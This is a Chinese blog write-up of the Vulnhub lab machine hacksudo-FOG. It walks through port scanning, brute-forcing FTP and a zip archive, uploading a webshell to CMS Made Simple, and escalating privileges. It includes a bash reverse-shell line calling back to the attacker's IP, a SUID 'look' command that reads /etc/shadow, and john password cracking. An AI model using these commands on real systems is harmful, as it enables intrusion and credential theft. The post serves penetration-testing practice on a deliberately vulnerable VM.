Vulnhub靶机:hacksudo-FOG

最新推荐文章于 2024-03-08 12:53:00 发布
最新推荐文章于 2024-03-08 12:53:00 发布
阅读量859 收藏 25
点赞数 18
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/136081652
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:hacksudo-FOG(10.0.2.48)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/hacksudo-fog,697/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.48

在这里插入图片描述

使用nmap端口扫描发现,靶机开放端口:21、22、80、111、443、2049、3306

在这里插入图片描述
在这里插入图片描述

80端口:打开网站发现网站页面下面漂浮着一个链接,点击链接网站跳转到另一个页面

在这里插入图片描述

该页面没有什么可利用的功能点,查看源码发现隐藏信息,一个提取音频文件隐藏信息的工具和容器的作者,可能存在用户名:hacksudo

caesar-cipher ==? https://github.com/hacksudo/SoundStegno
box author : hacksudo

在这里插入图片描述

使用gobuster对网站进行目录爆破

gobuster dir -u http://10.0.2.48 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

尝试使用dirbuster进行目录爆破,补充信息

在这里插入图片描述

综合上面的扫描结果

/dict.txt #字典文件

/cms/ #一个CMS Made Simple搭建的网站

/cms/admin/login.php #网站的登录界面

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

打开CMS Made Simple搭建的网站可以看到版本信息V2.2.5

在这里插入图片描述

三、漏洞利用

可以使用searchsploit命令搜索该cms的历史漏洞

searchsploit CMS Made Simple

在这里插入图片描述

发现存在命令执行漏洞,但要利用该漏洞需要知道用户名密码

可以尝试使用用户名hacksudo和之前目录爆破得到的字典对登陆界面进行爆破

在这里插入图片描述

爆破完成,未发现可用的用户名密码

根据nmap扫描结果,靶机还开放了21、22、3306端口,可以尝试对这些端口进行爆破

hydra -l hacksudo -P passwd.txt 10.0.2.48 ftp -t 64

在这里插入图片描述

爆破ftp成功,得到用户名密码:hacksudo/hackme

在这里插入图片描述

登录ftp发现里面存在一些文件,存在一个压缩文件和flag1.txt

查看flag1.txt

在这里插入图片描述

打开压缩文件发现被加密了,使用fcrackzip进行暴力破解,得到密码:fooled

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secr3tSteg.zip

在这里插入图片描述

解压压缩文件,发现一个wav音频文件

在这里插入图片描述

使用之前提示的工具,提取音频文件的隐藏信息

git clone https://github.com/hacksudo/SoundStegno
cd SoundStegno
python ExWave.py -f ../hacksudoSTEGNO.wav

Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR

在这里插入图片描述

提取出来的隐藏信息乱码,可能被加密了,使用凯撒密码解密,当偏移量为3时,解密成功

在这里插入图片描述

Pefcq yv 3
XYZABCDEFGHIJKLMNOPQRSTUVW
ABCDEFGHIJKLMNOPQRSTUVWXYZ
wwww.localhost/fog Username=fog:password=hacksudoISRO

使用得到的用户名密码登录网站,登录成功

在这里插入图片描述

发现文件上传功能,但直接上传php文件上传不上去,可以上传phtml文件绕过,上传一句话木马,使用蚁剑连接

在这里插入图片描述

在这里插入图片描述

连接成功

在这里插入图片描述

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

在这里插入图片描述
在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

查看一下具有SUID权限的二进制可执行文件,发现look命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

搜索使用方法:look | GTFOBins

查看/etc/shadow文件内容

/usr/bin/look '' /etc/shadow

在这里插入图片描述
在这里插入图片描述

获得root用户和isro用户的加密的密码,可以将这些密码复制到主机,使用john工具进行暴力破解

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

在这里插入图片描述

爆破暂时只得到isro用户的密码:qwerty,如果密码字典足够强大可以直接得到root权限

切换为isro用户

在这里插入图片描述

查看具有sudo权限的程序,发现可以以root权限运行ls查看/home/isro/*文件夹下的文件

在这里插入图片描述

查看/home/isro/目录有什么可利用的文件,发现一个flag

在这里插入图片描述

/home/isro/fog文件夹下存在一个fog程序

在这里插入图片描述

我们直接运行看看,发现是python程序,查看运行python程序的权限,发现是root权限

import os
os.system('id')

在这里插入图片描述

使用python提权

import os
os.system("/bin/sh")

在这里插入图片描述

获取flag

在这里插入图片描述

参考链接:Vulnhub 靶场 HACKSUDO: FOG - sainet - 博客园 (cnblogs.com)

huang0c
关注
  • 18
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机
weixin_43902100的博客
09-28 271
vulnhub靶场:ME AND MY GIRLFRIEND: 1 靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 实验环境:VMware,kali虚拟机 实战WP 寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065) nmap扫描
Vulnhub靶机
weixin_43902100的博客
09-21 622
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
Vulnhub靶机-Prime1
最新发布
m0_74855736的博客
03-08 944
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
VulnHub靶机-SkyTower
Slow_的博客
02-26 607
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 242
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
Vulnhub靶机 FourAndSix2
菜浪马废的博客
09-16 156
目标靶机ip:192.168.80.139 开放nfs 有一个压缩文件 里面有id-rsa 但是加密了 得到密码:chocolate 用户名:user 还有一层验证 cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机:LAMPSECURITY_ CTF5
LainWith的博客
12-23 1097
(此系列共5台)发布日期:2009年5月10日难度:初运行环境:VMware Workstation目标:取得 root 权限补充:解压下载得到的靶机,你会看到自带的一份官方攻略主机发现端口扫描+漏洞扫描敏感信息泄露cms挂马敏感信息提权。
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 284
Vulnhub靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
vulnhub靶机-mrRobot
臭nana的博客
05-19 1606
下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 描述: Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn't too difficult. There is
Vulnhub靶机: DarkHole
sszsNo1的博客
07-02 157
Vulnhub靶机: DarkHole如何打靶
vulnhub靶机:GoldenEye-v1
prettyX的博客
04-06 955
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
Vulnhub靶机 Vuluix
菜浪马废的博客
04-14 227
发现25端口 nmap -sP 192.168.0.0/24 nmap -sV -A -O 192.168.0.136 对smtp进行枚举 apt-get install smtp-user-enum smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192....
Vulnhub-XXE靶机
djpcs2013的博客
06-10 438
1.主机发现 nmap -sS 192.168.74.1/24 就是192.168.74.158没错了,开放了80端口。 2.前期信息收集 访问192.168.74.158,就是apache默认页。 御剑扫目录。 访问robots.txt。存在/xxe/路径,admin.php。 ip/xxe为登录界面。 admin.php在/xxe/目录下。ip/xxe...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值